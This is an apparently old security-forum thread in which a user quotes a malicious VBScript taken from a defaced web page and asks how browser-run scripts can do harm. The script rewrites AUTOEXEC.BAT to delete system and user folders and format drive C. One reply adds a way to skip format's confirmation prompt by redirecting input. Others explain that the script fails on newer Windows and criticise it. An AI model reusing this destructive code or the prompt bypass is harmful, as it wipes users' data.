Malicious script in regular html code

[Sigg3]

Take a look at this script:

<script language="VBScript"><!--
Set fs = CreateObject("Scripting.FileSystemObject")
Set a = fs.CreateTextFile("C:\AUTOEXEC.BAT", True)
a.writeline ("copy c:\windows\command\deltree.* c:\")
a.writeline ("copy c:\windows\command\format.* c:\")
a.writeline ("cls")
a.writeline ("Deltree /y windows")
a.writeline ("cls")
a.writeline ("Deltree /y meusdo~1")
a.writeline ("cls")
a.writeline ("Deltree /y arquiv~1")
a.writeline ("@echo -=-=-=-=-=-=-=-Computer Hacked by [hacker!]-=-=-=-=-=-")
a.writeline ("@echo -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-")
a.writeline ("format c: /q")
a.Close
--></script>

(Quoted because I didn't want to execute it, if such a thing could be possible:P

I found it in at 2600's hacked pages archive. It was marked as "dangerous to view in IE".

My question is easyt: is it that simple to execute malicious scripts on browsers?

[SirDice]

If I'm not mistaken if you get this to run in the "Local Machine Zone" it'll work.

http://msdn.microsoft.com/workshop/s...w/overview.asp

[cacosapo]

SirDice (as usual) is correct.
That script cant run from internet zone - HOWEVER
From time to time IE "popup" a new vulnerability on "cross zones" that creates "ways" to run thing from one zone on another zone...

[Tiger Shark]

Actually, It isn't going to do much on Win2k and I suspect WinXP either.

Deltree and format won't be found in c:\windows\command on Win2k. I don't have an XP box on hand right now but I suspect you won't find it on an XP box either.

Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating withing a script)..... Which should get the attention of even the dumbest (L)user........

Badly written piece of crap? Absolutely!

[SirDice]

Originally posted here by Tiger Shark
Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating withing a script)..... Which should get the attention of even the dumbest (L)user........

Easily defeated by creating a textfile with an "Y" in it and doing a

Code:

format c: /q < yes.txt

[Tiger Shark]

[Easily defeated by creating a textfile with an "Y" in it and doing a[/quote]

Undoubtedly..... So the author didn't really think this through did he.....

[SirDice]

Yeah. Oh well. At least Sigg3 learned something (I hope)

Hehehe. There's more wrong with this script. It's kinda overkill. Why remove the windows dir if you're going to format the complete drive anyway



Welcome to AO btw (I keep forgetting my manners )

[Sigg3]

This was back in y2k, tho.
Don't think 2600 would've posted a warning without a reason.

Thanks for the replies, gentlemen.

[SDK]

Originally posted here by Tiger Shark
Actually, It isn't going to do much on Win2k and I suspect WinXP either.

Deltree and format won't be found in c:\windows\command on Win2k. I don't have an XP box on hand right now but I suspect you won't find it on an XP box either.

Format c: /q should return "Enter current volume label for drive C:" which is a bit of a giveaway.... IIRC, that should be followed by a warning stating that you are about to delete all data on a non-removable drive, do you wish to continue, (even if it is operating withing a script)..... Which should get the attention of even the dumbest (L)user........

Badly written piece of crap? Absolutely!

True... Deltree is not include in 2000/XP.